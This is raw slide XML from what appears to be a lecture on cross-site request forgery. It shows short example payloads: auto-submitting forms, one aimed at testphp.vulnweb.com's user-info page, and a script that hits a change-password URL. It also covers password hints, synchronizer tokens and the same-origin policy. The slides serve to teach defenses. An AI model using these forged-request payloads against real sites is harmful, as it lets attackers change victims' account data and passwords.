            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="390596"/>
            <a:ext cx="11704322" cy="1625601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="65023" tIns="65023" rIns="65023" bIns="65023"/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="914400">
              <a:defRPr sz="6200">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide2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0" name="Examples"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="390596"/>
            <a:ext cx="11704322" cy="1625601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1903" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1115741" y="2271884"/>
            <a:ext cx="10250758" cy="6451643"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="10250757" cy="6451641"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1901" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="10198059" cy="6451642"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 3017"/>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902" name="&lt;body onload=&quot;document.getElementById('f').submit()&quot;&gt;…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="81073" y="263886"/>
              <a:ext cx="10169685" cy="61435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l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>&lt;body onload="document.getElementById('f').submit()"&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>&lt;form id="f" action="http://testphp.vulnweb.com/userinfo.php" method="post" name="form1"&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>&lt;input name="urname" value="attacker’svalue"&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>&lt;input name="ucc" value=" attacker’svalue"&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>&lt;input name="uemail" value=" attacker’svalue"&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>&lt;input name="uphone" value=" attacker’svalue"&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>&lt;textarea name="uaddress" wrap="soft"&gt;&lt;attacker’svalue&gt;&lt;/textarea&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>&lt;input name="update" value="update"&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>&lt;/form&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>&lt;/body&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide2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7" name="Examples"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="390596"/>
            <a:ext cx="11704322" cy="1625601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1910" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1115741" y="2271884"/>
            <a:ext cx="10250758" cy="6451643"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="10250757" cy="6451641"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1908" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="10198059" cy="6451642"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 3017"/>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909" name="&lt;html&gt;…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="81073" y="263886"/>
              <a:ext cx="10169685" cy="61435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l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>&lt;html&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>&lt;body&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>&lt;form action="" method="post" id="formid"&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>&lt;input type="hidden" name="attack" value="valuegoeshere" /&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>&lt;/form&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>&lt;script&gt;document.getElementById('formid').submit();&lt;/script&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>&lt;/body&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>&lt;/html&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide2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4" name="Examples"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="390596"/>
            <a:ext cx="11704322" cy="1625601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1917" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1115741" y="2271884"/>
            <a:ext cx="10250758" cy="6451643"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="10250757" cy="6451641"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1915" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="10198059" cy="6451642"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 3017"/>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916" name="&lt;script&gt;…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="81073" y="263886"/>
              <a:ext cx="10169685" cy="61435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l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>&lt;script&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>var poniz = new Image();</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>test.poniz = "http://targetsite.com/change_password.php?new_password=123456";</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>&lt;/script&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:gr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4" name="Hint"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Hint</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="705" name="In some applications, the recovery challenge is replaced with a simple password “hint” that is configurable by users during registration. Users commonly set extremely obvious hints, even one that is identical to the password itself, on the false assumption that only they will ever see them."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="388620" indent="-388620" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="AA2B1E"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
              <a:buFont typeface="Brush Script MT"/>
              <a:buChar char="O"/>
              <a:defRPr sz="3400">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:ea typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:sym typeface="Franklin Gothic Book"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>In some applications, the recovery challenge is replaced with a simple password “hint” that is configurable by users during registration. Users commonly set extremely obvious hints, even one that is identical to the password itself, on the false assumption that only they will ever see them.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide2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1" name="Synchronizer token pattern"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="390596"/>
            <a:ext cx="11704322" cy="1625601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Synchronizer token pattern</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1924" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1115741" y="2271884"/>
            <a:ext cx="10250758" cy="3491427"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="10250757" cy="3491425"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1922" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="10198059" cy="3466080"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 5615"/>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923" name="&lt;form action=&quot;http://bank.com/transfer&quot; method=&quot;post&quot;&gt;…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="81073" y="263886"/>
              <a:ext cx="10169685" cy="3227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l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>&lt;form action="http://bank.com/transfer" method="post"&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>  &lt;p&gt;&lt;input type="hidden" name="authenticity_token" value="j/DcoJ2VZvr7vdf8CHKsvjdlDbmiizaOb5B8DMALg6s=" &gt;&lt;/p&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>  &lt;p&gt;&lt;input type="hidden" name="to" value="ciro"&gt;&lt;/p&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>  &lt;p&gt;&lt;input type="hidden" name="ammount"  value="100"&gt;&lt;/p&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>  &lt;p&gt;&lt;button type="submit"&gt;Send 100$ to Ciro.&lt;/button&gt;&lt;/p&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>&lt;/form&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1925" name="So if evil.com makes a post single request, he would never guess that token, and the server would reject the transaction."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="331716" y="7462241"/>
            <a:ext cx="12801028" cy="84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So if evil.com makes a post single request, he would never guess that token, and the server would reject the transaction.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide2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9" name="Examples"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="390596"/>
            <a:ext cx="11704322" cy="1625601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1932" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2215728" y="2271884"/>
            <a:ext cx="8050784" cy="5067019"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="8050783" cy="5067017"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1930" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="8009395" cy="5067018"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 3017"/>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931" name="what prevents the evil.com from making 2 requests:…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="63674" y="207252"/>
              <a:ext cx="7987110" cy="48250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l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>what prevents the evil.com from making 2 requests:</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>XHR GET for the token</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>XHR POST containing the good token</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1933" name="This is where the SOP comes into play"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3662284" y="8433772"/>
            <a:ext cx="5329112"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This is where the SOP comes into play</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide2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7" name="Same origin Policy"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="390596"/>
            <a:ext cx="11704322" cy="1625601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Same origin Policy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1940" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1115741" y="2271884"/>
            <a:ext cx="10250758" cy="1660815"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="10250757" cy="1660814"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1938" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="10198059" cy="1660815"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 117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939" name="&lt;form action=&quot;http://someotherserver.com&quot;&gt;"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="81073" y="263886"/>
              <a:ext cx="10169685" cy="11330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l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>&lt;form action="</a:t>
              </a:r>
              <a:r>
                <a:rPr u="sng">
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                  <a:uFill>
                    <a:solidFill>
                      <a:srgbClr val="0000FF"/>
                    </a:solidFill>
                  </a:uFill>
                  <a:hlinkClick r:id="rId3" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
                </a:rPr>
                <a:t>http://someotherserver.com</a:t>
              </a:r>
              <a:r>
                <a:t>"&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1941" name="same origin policy is applicable only for browser side programming languages. there is no javascript involved in posting the form, then the same origin policy is not applicable."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="450682" y="5208530"/>
            <a:ext cx="12272775" cy="841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914400">
              <a:defRPr sz="2400">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>same origin policy is applicable only for browser side programming languages. there is no javascript involved in posting the form, then the same origin policy is not applicable. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
